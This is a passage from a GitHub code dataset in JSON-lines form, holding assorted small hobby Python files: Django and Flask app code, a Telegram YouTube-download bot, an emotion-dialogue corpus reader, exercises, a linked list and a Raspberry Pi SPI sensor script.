self.repeatDrawBar(x)\r\n\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n ui = ImgDisp()\r\n ui.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"Curious-chen/curriculum-design","sub_path":"algorithm/TopicA4/DateDisplay.py","file_name":"DateDisplay.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"23700104472","text":"from datetime import datetime\nfrom decimal import Decimal\n\nfrom app.services import db\n\n\nclass TransactionModel(db.Model):\n __tablename__ = \"transactions\"\n\n id = db.Column(db.Integer, primary_key=True)\n date = db.Column(db.DateTime)\n payee = db.Column(db.String(150))\n inflow = db.Column(db.Boolean)\n amount = db.Column(db.Numeric(precision=10, scale=2), nullable=False)\n raw_value = db.Column(\n db.Numeric(precision=10, scale=2, asdecimal=True), nullable=False\n )\n\n category_id = db.Column(\n db.Integer, db.ForeignKey(\"category.id\"), unique=False, nullable=False\n )\n category = db.relationship(\"CategoryModel\", back_populates=\"transactions\")\n\n account_id = db.Column(\n db.Integer, db.ForeignKey(\"accounts.id\"), unique=False, nullable=False\n )\n account = db.relationship(\"AccountModel\", back_populates=\"transactions\")\n\n def __init__(\n self,\n date: datetime,\n payee: str,\n amount: float,\n inflow: bool,\n account_id: int,\n category_id: int,\n ):\n self.date = date\n self.payee = payee\n\n if amount < 0:\n inflow = not inflow\n amount = amount * -1\n\n self.inflow = Decimal(inflow)\n self.amount = amount\n self.raw_value = Decimal(amount) if inflow else Decimal(amount * -1)\n self.account_id = account_id\n self.category_id = category_id\n\n def __repr__(self):\n return f\"\"\n","repo_name":"ydaud/budget-api","sub_path":"app/models/transaction_model.py","file_name":"transaction_model.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25848704244","text":"from django.conf import settings\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.mail import send_mail\nfrom django.db.models import Q\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse, reverse_lazy\nfrom django.views import View\nfrom django.views.generic import ListView\nfrom django.views.generic.detail import DetailView\nfrom zapis.forms import AddTaskForm, TodoItemExportForm, TodoItemForm\nfrom zapis.models import TodoItem\nfrom django.shortcuts import redirect, render, get_object_or_404\nfrom taggit.models import Tag\n\n\nclass ZapisDetailsView(DetailView):\n model = TodoItem\n template_name = 'zapis/details.html'\n\n\n\n@login_required\n\n\ndef complete_zapis(request, uid):\n t = TodoItem.objects.get(id=uid)\n t.is_completed = True\n t.save()\n return HttpResponse(\"OK\")\n\n\ndef add_zapis(request):\n if request.method == \"POST\":\n desc = request.POST[\"description\"]\n t = TodoItem(description=desc)\n t.save()\n return redirect(reverse(\"zapis:list\"))\n\n\ndef delete_zapis(request, uid):\n t = TodoItem.objects.get(id=uid)\n t.delete()\n return redirect(reverse(\"zapis:list\"))\n\n\nclass ZapisListView(LoginRequiredMixin, ListView):\n model = TodoItem\n context_object_name = \"zapis\"\n template_name = \"zapis/list.html\"\n\n def 
get_queryset(self):\n u = self.request.user\n qs = super().get_queryset()\n return qs.filter(owner=u)\n\n\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n\n user_zapis = self.get_queryset()\n tags = []\n for t in user_zapis:\n tags.append(list(t.tags.all()))\n\n def filter_tags(tags_by_task):\n t = []\n for tags in tags_by_task:\n for tag in tags:\n if tag not in t:\n t.append(tag)\n return t\n\n context['tags'] = filter_tags(tags)\n return context\n\n\nclass ZapisCreateView(LoginRequiredMixin, View):\n def post(self, request, *args, **kwargs):\n form = TodoItemForm(request.POST)\n if form.is_valid():\n new_zapis = form.save(commit=False)\n new_zapis.owner = request.user\n new_zapis.save()\n return redirect(reverse(\"zapis:list\"))\n\n return render(request, \"zapis/create.html\", {\"form\": form})\n\n def get(self, request, *args, **kwargs):\n form = TodoItemForm()\n return render(request, \"zapis/create.html\", {\"form\": form})\n\n\nclass ZapisEditView(LoginRequiredMixin, View):\n def post(self, request, pk, *args, **kwargs):\n t = TodoItem.objects.get(id=pk)\n form = TodoItemForm(request.POST, instance=t)\n if form.is_valid():\n new_task = form.save(commit=False)\n new_task.owner = request.user\n new_task.save()\n form.save_m2m()\n return redirect(reverse(\"zapis:list\"))\n\n return render(request, \"zapis/edit.html\", {\"form\": form})\n\n def get(self, request, pk, *args, **kwargs):\n t = TodoItem.objects.get(id=pk)\n form = TodoItemForm(instance=t)\n return render(request, \"zapis/edit.html\", {\"form\": form, \"zapis\": t})\n\n\n\nclass ZapisExportView(LoginRequiredMixin, View):\n def generate_body(self, user, priorities):\n q = Q()\n if priorities[\"prio_high\"]:\n q = q | Q(priority=TodoItem.PRIORITY_HIGH)\n if priorities[\"prio_med\"]:\n q = q | Q(priority=TodoItem.PRIORITY_MEDIUM)\n if priorities[\"prio_low\"]:\n q = q | Q(priority=TodoItem.PRIORITY_LOW)\n zapis = TodoItem.objects.filter(owner=user).filter(q).all()\n\n body = \"Ваши записи и процедуры:\\n\"\n for t in list(zapis):\n if t.is_completed:\n body += f\"[x] {t.description} ({t.get_priority_display()})\\n\"\n else:\n body += f\"[ ] {t.description} ({t.get_priority_display()})\\n\"\n\n return body\n\n def post(self, request, *args, **kwargs):\n form = TodoItemExportForm(request.POST)\n if form.is_valid():\n email = request.user.email\n body = self.generate_body(request.user, form.cleaned_data)\n send_mail(\"Записи\", body, settings.EMAIL_HOST_USER, [email])\n messages.success(request, \"Записи были отправлены на почту %s\" % email)\n else:\n messages.error(request, \"Что-то пошло не так, попробуйте ещё раз\")\n return redirect(reverse(\"zapis:list\"))\n\n def get(self, request, *args, **kwargs):\n form = TodoItemExportForm()\n return render(request, \"zapis/export.html\", {\"form\": form})\n\n\ndef zapis_by_tag(request, tag_slug=None):\n u = request.user\n zapis = TodoItem.objects.filter(owner=u).all()\n\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n zapis = zapis.filter(tags__in=[tag])\n\n all_tags = []\n for t in zapis:\n all_tags.append(list(t.tags.all()))\n\n def filter_tags(tags_by_zapis):\n t = []\n for tags in tags_by_zapis:\n for tag in tags:\n if tag not in t:\n t.append(tag)\n return t\n\n all_tags = filter_tags(all_tags)\n\n return render(\n request,\n \"zapis/list.html\",\n {\"tag\": tag, \"zapis\": zapis, \"all_tags\": all_tags},\n 
)\n","repo_name":"ovr1/MySite","sub_path":"zapis/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33297282025","text":"from random import randint\n\n# Task 1\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = numbers.index(min(numbers))\nmax_index = numbers.index(max(numbers))\nprint(min_index, max_index)\n\n\n# Task 2\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = 0\nmax_index = 0\nfor i in range(len(numbers)):\n if numbers[i] < numbers[min_index]:\n min_index = i\n if numbers[i] > numbers[max_index]:\n max_index = i\n\nprint(min_index, max_index)\n\n\n# Task 3\nnumbers = [randint(-20, 20) for i in range(10)]\nprint(numbers)\n\nmin_index = numbers.index(min(numbers))\nmax_index = numbers.index(max(numbers))\nleft = min(min_index, max_index)\nright = max(min_index, max_index)\n\nprint(sum(numbers[left + 1: right]))\n","repo_name":"kuzminprog/python-school77","sub_path":"module02/solution/topic03_02.py","file_name":"topic03_02.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70094045689","text":"import telebot\r\nfrom telebot import types\r\nfrom pytube import YouTube\r\nimport os\r\n\r\n\r\n\r\nbot = telebot.TeleBot('')\r\n\r\n@bot.message_handler(commands=['start'])\r\ndef start(message):\r\n markup = types.InlineKeyboardMarkup()\r\n markup.add(types.InlineKeyboardButton('продолжить', callback_data= 'continue' ))\r\n bot.send_message(message.chat.id, 'Привет, этот бот скачает любое видео из ютуб! Нажимай кнопку продолжить.', reply_markup=markup )\r\n\r\n@bot.callback_query_handler(func=lambda calback:True)\r\ndef callback_message(callback):\r\n if callback.data == 'continue':\r\n bot.send_message(callback.message.chat.id, 'Введите ссылку на видео:')\r\n\r\n@bot.message_handler()\r\ndef link_text(message):\r\n try:\r\n link = message.text\r\n yt = YouTube(link)\r\n video = yt.streams.get_highest_resolution()\r\n # Получение размера видео\r\n video_size = video.filesize\r\n # Скачивание видео\r\n video.download(output_path='', filename='2.mp4')\r\n # Отправка сообщения о начале скачивания\r\n bot.send_message(message.chat.id, \"Видео началось скачиваться...\")\r\n # Ожидание, пока файл полностью скачается\r\n while os.path.getsize('2.mp4') != video_size:\r\n pass\r\n # Отправка видео пользователю\r\n with open('2.mp4', 'rb') as video_file:\r\n bot.send_video(message.chat.id, video_file)\r\n # Удаление временного файла\r\n os.remove('2.mp4')\r\n\r\n except Exception as e:\r\n bot.reply_to(message, \"Ошибка при скачивании видео: \" + str(e))\r\n\r\nbot.polling(none_stop=True)","repo_name":"Lzinaliev/Projects","sub_path":"ytbot.py","file_name":"ytbot.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"24711684348","text":"#!/usr/bin/env python3\n#!/usr/bin/python\n\nimport os\nimport re\nimport sys\n\nclass Tournament():\n def __add__(self,other):\n t = Tournament()\n t.games = []\n t.games.extend(self.games)\n t.games.extend(other.games)\n return t\n\n\nclass HumanHumanTournament(Tournament):\n \"\"\"A set of emo20q games played by two humans\"\"\"\n\n def __init__(self, annotationFile=None):\n# self.base = Base()\n if not annotationFile:\n import os\n annotationFile = 
os.path.dirname(__file__) + \"/../wechat_pilot/emo20q_glossing_final_anonymous.txt\"\n f = open(annotationFile, 'r', encoding=\"utf-8\")\n try:\n self.games = [m for m in self.readGames(f)]\n #for m in self.readGames(f):\n # print(m.turns[0])\n finally:\n f.close()\n\n def readGames(self,fh):\n games = []\n while True:\n line = fh.readline()\n #print(line)\n if not line:\n break\n game = Game()\n turns = []\n if re.match(\"match:\\d+\", line):\n m = re.match(\"match:\\d+, ?answerer:(?P.+?), ?questioner:(?P.+?), ?start:\\\"(?P.+?)\\\"\", line)\n # note game/match records do not all have level\n game.answerer = m.group('answerer')\n game.questioner = m.group('questioner')\n game.start = m.group('start')\n turns = [turn for turn in game.readTurns(fh)]\n line = fh.readline()\n m = re.match(r\"end:\\\"(?P.+?)\\\", ?emotion:(?P.+?), ?questions:(?P.+?), ?outcome:(?P.+?)(, ?.*)\", line)\n game.end = m.group('end');\n game.emotion = m.group('emotion');\n game.questions = m.group('questions');\n game.outcome = m.group('outcome');\n game.turns = turns\n #print(game._emotion)\n yield(game)\n\n\n def printStats(self):\n print(\"there are {0:d} games\".format(len(t.games)))\n #sum up the turns\n sumTurns = 0\n for m_idx,m in enumerate(t.games):\n assert isinstance(m, Game)\n assert type(m.turns) == list\n print(\" In game {0:d} there are {1:d} turns.\".format(m_idx,len(m.turns)))\n for tn_idx,tn in enumerate(m.turns):\n assert isinstance(tn,Turn)\n #further tests\n sumTurns = sumTurns + len(m.turns)\n\n print(\"In all, there are {0:d} turns.\".format(sumTurns))\n\n\nclass Game(object):\n \"\"\"An emo20q game instance\"\"\"\n\n def readTurns(self,fh):\n while True:\n turn = Turn()\n question = \"\"\n answer = \"\"\n qgloss = \"\"\n agloss = \"\"\n while True:\n line = fh.readline()\n #print(\"question: \"+line)\n if not line:\n break\n if re.match(\"end:\", line):\n fh.seek(fh.tell() - len(line.encode(\"utf-8\")),\n os.SEEK_SET)\n return\n if re.match(\"^ *$\", line):\n continue\n elif re.match(\"gloss:\", line):\n m = re.match(\"gloss:{(.*)}\", line)\n qgloss = m.group(1)\n break\n else:\n question += line\n\n while True:\n line = fh.readline()\n #print(\"answer: \"+line)\n if not line:\n break\n if re.match(\"end:\", line):\n fh.seek(fh.tell() - len(line.encode(\"utf-8\")),\n os.SEEK_SET)\n break\n if re.match(\"-\", line):\n continue\n elif re.match(\"gloss:\", line):\n m = re.match(\"gloss:{(.*)}\", line)\n agloss = m.group(1)\n break\n else:\n answer += line\n\n turn.q = question.strip()\n turn.qgloss = qgloss.strip()\n turn.a = answer.strip()\n turn.agloss = agloss.strip()\n #ignore non-yes-no questions and their answers\n if \"non-yes-no\" in turn.agloss: continue\n if \"non-yes-no\" in turn.qgloss: continue\n yield turn\n\nclass Turn(object):\n \"\"\"One of the question/answer pairs from and emo20q game\"\"\"\n\n def questionId(self):\n return self.qgloss\n def answerId(self):\n ans = \"other\"\n if \"agloss\" in self.__dict__:\n if self.agloss.find(\"yes\") == 0 : ans = \"yes\"\n if self.agloss.find(\"no\") == 0 : ans = \"no\"\n else:\n if self.a.lower().find(\"yes\") == 0 : ans = \"yes\"\n if self.a.lower().find(\"no\") == 0 : ans = \"no\"\n\n return ans\n\nclass Question(object):\n \"\"\"Keeps track of question strings\"\"\"\n\n def __init__(self,q,gloss):\n self.q = q\n self.gloss = gloss\n\nclass Answer(object):\n \"\"\"Keeps track of answer strings\"\"\"\n\n def __init__(self,a,gloss):\n self.a = a\n self.gloss = gloss\n\n\n\nif __name__ == \"__main__\":\n\n import argparse\n parser = 
argparse.ArgumentParser(description=\"\"\"study information contained in the gloss file \"\"\")\n parser.add_argument('-e', '--emotions',\n action='store_true',\n help='print list of emotions, from end: annotation')\n parser.add_argument('-w', '--webpage',\n default=False,\n help='generate a webpage rendering of the data')\n # can add new arguments to argparser to implement new features\n # e.g parser.add_argument('-p', '--players', ...\n\n args = parser.parse_args()\n if args.emotions: # if -e or --emotion flag is used\n # read in tournament\n t = HumanHumanTournament()\n assert isinstance(t, Tournament) # t is Tournament class\n assert type(t.games ) == list # games() returns a list\n for g in t.games:\n print(g.emotion)\n if args.webpage: # if --html flag is used\n if not os.path.isdir(args.webpage):\n sys.exit(args.webpage + \" must be a directory\")\n from jinja2 import Template, Environment, BaseLoader\n import jieba\n basetemplate = Environment(loader=BaseLoader).from_string(\"\"\"\n \n \n {% block title %}{% endblock %}\n \n \n {% block body %}{% endblock %}\n \n \n \"\"\")\n index = Template(\"\"\"\n \n \n EMO20Q-CN Index \n \n \n

<h1> EMO20Q-CN Index </h1>\n <ul>\n {% for game in games %}\n <li> <a href=\"{{ loop.index0 }}.html\"> Game {{ loop.index }}: {{ game.emotion }} </a> </li>\n {% endfor %}\n </ul>\n </body>\n </html>\n \"\"\")\n\n dialog = Template(\"\"\"\n <html>\n <head>\n <title> EMO20Q-CN Game/Dialog </title>\n </head>\n <body>\n <h1> EMO20Q-CN Game/Dialog </h1>\n <ul>\n {% for turn in turns %}\n <li> Turn {{ loop.index }}\n <ul>\n <li> Q: {{ cut(turn.q)|join(\" \") }} </li>\n <li> A: {{ cut(turn.a)|join(\" \") }} </li>\n </ul>\n </li>\n {% endfor %}\n </ul>
\n \n \n \"\"\")\n\n # read in tournament\n t = HumanHumanTournament()\n assert isinstance(t, Tournament) # t is Tournament class\n assert type(t.games ) == list # games() returns a list\n games = [g for g in t.games]\n with open(os.path.join(args.webpage, \"index.html\"), \"w\") as f:\n print(index.render(games=games), file=f)\n\n for i, game in enumerate(games):\n with open(os.path.join(args.webpage, str(i)+\".html\"), \"w\") as f:\n print(dialog.render(turns=game.turns, cut=jieba.cut), file=f)\n\n else:\n parser.print_help()\n","repo_name":"abecode/emo20q-cn","sub_path":"emo20q/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29452007779","text":"class Ciudad:\n def __init__(self, x, y):\n self.xo = x\n self.yo = y\n self.x = x\n self.y = y\n\n def camino(self, other):\n camino = []\n terminado = False\n while not terminado:\n if self.x == other.x and self.y == other.y:\n terminado = True\n\n paso = []\n if self.x < other.x:\n paso.append(self.x)\n self.x += 1\n\n elif other.x < self.x:\n paso.append(other.x)\n other.x += 1\n\n else:\n paso.append(self.x)\n\n if self.y < other.y:\n paso.append(self.y)\n self.y += 1\n\n elif other.y < self.y:\n paso.append(other.y)\n other.y += 1\n\n else:\n paso.append(self.y)\n\n camino.append(paso)\n\n return camino\n\n def distancia(self, other):\n distancia = ((self.xo-other.xo)**2 + (self.yo-other.yo)**2)**(1/2)\n return distancia\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema3_ej5/tema3_ej5_82e1a4d9a93c1ed4d6296e2bc4888387.py","file_name":"tema3_ej5_82e1a4d9a93c1ed4d6296e2bc4888387.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11629644005","text":"import os\n\nfrom vocabulary import Vocabulary\n\nmsx_map = {\n \"ю\": 192,\n \"а\": 193,\n \"б\": 194,\n \"ц\": 195,\n \"д\": 196,\n \"е\": 197,\n \"ф\": 198,\n \"г\": 199,\n\n \"х\": 200,\n \"и\": 201,\n \"й\": 202,\n \"к\": 203,\n \"л\": 204,\n \"м\": 205,\n \"н\": 206,\n \"о\": 207,\n\n \"п\": 208,\n \"я\": 209,\n \"р\": 210,\n \"с\": 211,\n \"т\": 212,\n \"у\": 213,\n \"ж\": 214,\n \"в\": 215,\n\n \"ь\": 216,\n \"ы\": 217,\n \"з\": 218,\n \"ш\": 219,\n \"э\": 220,\n \"щ\": 221,\n \"ч\": 222,\n \"ъ\": 223,\n\n \"Ю\": 224,\n \"А\": 225,\n \"Б\": 226,\n \"Ц\": 227,\n \"Д\": 228,\n \"Е\": 229,\n \"Ф\": 230,\n \"Г\": 231,\n\n \"Х\": 232,\n \"И\": 233,\n \"Й\": 234,\n \"К\": 235,\n \"Л\": 236,\n \"М\": 237,\n \"Н\": 238,\n \"О\": 239,\n\n \"П\": 240,\n \"Я\": 241,\n \"Р\": 242,\n \"С\": 243,\n \"Т\": 244,\n \"У\": 245,\n \"Ж\": 246,\n \"В\": 247,\n\n \"Ь\": 248,\n \"Ы\": 249,\n \"З\": 250,\n \"Ш\": 251,\n \"Э\": 252,\n \"Щ\": 253,\n \"Ч\": 254\n }\n\ndef encode(src):\n dst = b\"\"\n for i in range(len(src)):\n if src[i] in \"()!? 
-_[]?!()\":\n dst += src[i].encode(\"latin-1\")\n elif src[i] in msx_map.keys():\n # u = bytes.fromhex(hex(msx_map[src[i]])[2:])\n u = chr(msx_map[src[i]]).encode(\"latin-1\")\n dst += u\n if len(src) != len(dst):\n print(f\"WARNING: {src} != {dst}\")\n return dst\n\n\ndef main():\n update=True\n language_list = [\"EN\", \"RU\"]\n vocabulary = Vocabulary(\"../data\", update=update)\n vocabulary.set_language_list(language_list)\n vocabulary.get_source_sets()\n line_nr=4000\n lines = []\n while True:\n row = vocabulary.sample(repeat=False)\n if row is None:\n break\n try:\n en_enc = row[\"EN\"].encode(\"ascii\") \n except:\n continue\n line = str(line_nr).encode(\"latin-1\") + b\" data \" + b\"\\\"\" + en_enc + b\"\\\"\" + b\"\\r\\n\"\n lines.append(line)\n ru_enc = encode(row[\"RU\"])\n line = str(line_nr + 1).encode(\"latin-1\") + b\" data \" + b\"\\\"\" + ru_enc + b\"\\\"\" + b\"\\r\\n\"\n lines.append(line)\n line_nr += 2\n with open(os.path.join(os.path.expanduser(\"~/Development/git/msx/src/basic/ru.bas\")), \"wb\") as fp:\n fp.writelines(lines)\n\n\n\n \n \n\n \n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"gilbertfrancois/rosetta","sub_path":"src/convert2msx.py","file_name":"convert2msx.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"33456382008","text":"import unittest\nfrom unittest.mock import patch\nfrom Tiles import Board\n\n\nclass TestReadInBoard(unittest.TestCase):\n\n @patch('Tiles.get_yes_or_no_input', return_value=True)\n def test_Standard_Board(self, input):\n Board.read_in_board()\n print(Board.spaces)\n self.assertEqual(41, len(Board.spaces)) # 41 due to jail/just visiting\n Board.default_board()\n\n\nclass TestDefaultBoard(unittest.TestCase):\n\n def test_default_board(self):\n self.assertEqual(len(Board.spaces), 40)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"KGB33/Monopoly","sub_path":"Monopoly/test_Board.py","file_name":"test_Board.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"16655909073","text":"# 杨辉三角对称法\r\nn = eval(input())\r\ntriangle = [[1], [1, 1]]\r\nfor i in range(2, n):\r\n tmp = triangle[-1] # 上一个列表\r\n cul = [1]*(i+1)\r\n for j in range(i//2):\r\n cul[j+1] = tmp[j]+tmp[j+1] # 临界值大约是中点处,但有例外\r\n if i != 2j: # 当j不为中点时\r\n cul[-j-2] = cul[j+1]\r\n triangle.append(cul)\r\nfor i in range(n): # 按照等边三角形格式输出\r\n s = \" \"*(n-1-i)\r\n for j in triangle[i]:\r\n s = s+str(j)+\" \" # 控制每行每个元素的间隔\r\n print(s)\r\n","repo_name":"shixiaoshena/ppp","sub_path":"杨辉三角3.py","file_name":"杨辉三角3.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18614767117","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n self.length = 0\n \n def append(self, data):\n new_node = Node(data)\n \n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail.next = new_node\n self.tail = new_node\n \n self.length += 1\n \n return self\n \n def prepend(self, data):\n new_node = Node(data)\n \n if self.length == 0:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.next = self.head\n self.head = new_node\n \n self.length += 1\n \n return self\n \n def __traverse_to_index(self, index):\n it = 
self.head\n i = 0\n \n while i < index:\n it = it.next\n i += 1\n \n return it\n \n def insert(self, index, data):\n if index >= self.length:\n return self.append(data) \n \n new_node = Node(data)\n leader = self.__traverse_to_index(index - 1)\n new_node.next = leader.next\n leader.next = new_node \n self.length += 1\n \n return self\n \n def remove(self, index):\n if index >= self.length:\n leader = self.__traverse_to_index(self.length - 2)\n leader.next = None\n self.length -= 1\n return self\n \n leader = self.__traverse_to_index(index - 1)\n leader.next = leader.next.next\n self.length -= 1\n \n return self\n \n def reverse(self):\n if not self.head.next:\n return self\n \n first = self.head\n self.tail = self.head\n second = first.next\n \n while second:\n temp = second.next\n second.next = first\n first = second\n second = temp\n \n self.head.next = None\n self.head = first\n \n return self\n \n def print(self):\n a_list = [] \n it = self.head\n \n while it:\n a_list.append(it.data)\n it = it.next\n \n print(f\"LinkedList(len:{self.length}):{a_list}\")\n \n\nll = LinkedList()\nll.append(10)\nll.append(5)\nll.append(16)\nll.print()\nll.prepend(1)\nll.print()\nll.insert(2, 99)\nll.insert(20, 88)\nll.print()\nll.reverse()\nll.print()\nll.reverse()\nll.remove(2)\nll.print()\nll.remove(2)\nll.print()\nll.remove(100)\nll.print()\nll.reverse()\nll.print()\n\n\n\n","repo_name":"emre-ergun/data-structure-alogrithms","sub_path":"python_review/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":2708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29471386539","text":"hombre_imaginario = \"\"\"\nEl hombre imaginario\nvive en una mansión imaginaria\nrodeada de árboles imaginarios\na la orilla de un río imaginario\n\nDe los muros que son imaginarios\npenden antiguos cuadros imaginarios\nirreparables grietas imaginarias\nque representan hechos imaginarios\nocurridos en mundos imaginarios\nen lugares y tiempos imaginarios\n\nTodas las tardes tardes imaginarias\nsube las escaleras imaginarias\ny se asoma al balcón imaginario\na mirar el paisaje imaginario\nque consiste en un valle imaginario\ncircundado de cerros imaginarios...\"\"\"\n\ndef estadisticas_frase(frase):\n palabras=frase.split()\n x=0\n espacio=0\n puntuacion=0\n totalLargo=0\n correccion=0\n Tcarac=len(frase)\n while x/_.html\n context_object_name = 'books'\n ordering = ['-created_date']\n filterset_fields = ['title', 'author', 'language', 'published_date']\n\n\nclass BooksDetailView(DetailView):\n model = PostBook\n\n\nclass BooksCreateView(CreateView):\n model = PostBook\n form_class = BooksCreateForm\n\n\nclass BooksUpdateView(UpdateView):\n model = PostBook\n form_class = BooksCreateForm\n\n\nclass BooksDeleteView(DeleteView):\n model = PostBook\n form_class = BooksCreateForm\n success_url = '/'\n\n# Filter view\n\n\ndef search(request):\n books_list = PostBook.objects.all()\n books_filter = PostBookFilter(request.GET, queryset=books_list)\n return render(request, 'BooksApp/search.html', {'filter': books_filter})\n","repo_name":"konfle/Books","sub_path":"BooksApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35347497852","text":"# -*- coding: UTF-8 -*-\n#\n# Given an array of strings, group anagrams together.\n#\n# For example, given: [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"],\n# Return:\n#\n# 
[\n# [\"ate\", \"eat\",\"tea\"],\n# [\"nat\",\"tan\"],\n# [\"bat\"]\n# ]\n# Note: All inputs will be in lower-case.\n#\n# Python, Python 3 all accepted.\n\n\nclass GroupAnagrams:\n def groupAnagrams(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: List[List[str]]\n \"\"\"\n m_map = {}\n for s in strs:\n chars = tuple(sorted(s))\n if m_map.get(chars) is None:\n m_map[chars] = list()\n m_map[chars].append(s)\n\n return list(m_map.values())\n","repo_name":"TonnyL/Windary","sub_path":"Python/GroupAnagrams.py","file_name":"GroupAnagrams.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":187,"dataset":"github-code","pt":"77"} +{"seq_id":"28417678522","text":"\"\"\"travelAndTourism URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom main.views import *\nfrom location.views import *\nfrom about.views import *\nfrom contactus.views import *\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',homepage),\n # path('login/',login),\n path('signin/signin/loggedin/',login),\n path('signin/loggedin/',login),\n path('signup/addNewUser/signin/',login),\n path('signin/',sign_in),\n path('signup/',sign_up),\n # path('signup/add_new_user/',sign_up),\n path('location/',location),\n # path('basic',basic),\n path('about/',about),\n path('contact_us/',contactus),\n path('location/kangra/',kangra),\n path('location/una/',una),\n path('location/kullu/',kullu),\n path('location/chamba/',chamba),\n path('location/solan/',solan),\n path('location/sirmaur/',sirmaur),\n path('location/hamirpur/',hamirpur),\n path('location/kinnaur/',kinnaur),\n path('location/bilaspur/',bilaspur),\n path('location/lahul_spiti/',lahul_spiti),\n path('location/shimla/',shimla),\n path('location/mandi/',mandi),\n # path('addNewUser/',add_user),\n path('signup/addNewUser/',add_user) #if this line missing , we get an error\n\n\n]\n","repo_name":"manishd01/travelAndTourismGuide","sub_path":"travelAndTourism/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70998204728","text":"# Based on Arduino code from https://medium.com/electronza/arduino-4-20ma-current-loop-revisited-a-simpler-calibration-procedure-5b6f6be4dc80\n\nimport spidev\nimport lgpio\nimport time\n\nspi_t = spidev.SpiDev()\nspi_t.open(0, 0)\n#spi_t.max_speed_hz = 1000000 #1MHz\nspi_t.max_speed_hz = 4800 #1MHz\nspi_t.mode = 0b00\nspi_t.lsbfirst = False\nspi_t.no_cs = True\n\n''' Resetting MCP3201\n * From MCP3201 datasheet: If the device was powered up with the CS pin low, \n * it must be brought high and back low to initiate communication.\n * The device will begin to sample the analog input on the first rising edge \n * after CS goes low. 
